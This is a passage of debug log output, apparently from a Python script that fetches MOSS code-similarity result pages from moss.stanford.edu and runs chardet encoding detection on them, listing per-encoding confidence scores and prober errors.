0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5297635729864526\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match185-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match185-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match185-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match183-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match183-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match183-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match184-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match184-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match184-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5375114513393936\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match190-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match190-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match190-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19115\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19102\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19115\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19102\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19102\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19103\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19102\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19095\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32109\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19082\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32096\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19095\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40586\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32109\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19082\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32096\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19082\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32096\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19083\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19082\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32097\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5456726203364073\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32096\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40586\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5448452721308212\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5327498218224236\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match192-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match192-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match192-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match191-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match191-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match191-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match189-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match189-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match189-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match188-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32123\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16929\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32110\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16916\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32123\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16929\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5473940179571593\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32110\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16916\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16916\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16917\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32110\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16916\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32111\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32110\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5299091852888042\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5327985642065864\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5616186488573214\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match188-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match188-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match193-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match193-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match193-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match187-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match187-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match187-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match194-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18936\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19599\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19586\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18923\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19599\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18936\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19586\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18923\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40586\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18923\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19586\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18924\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19587\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18923\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19586\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 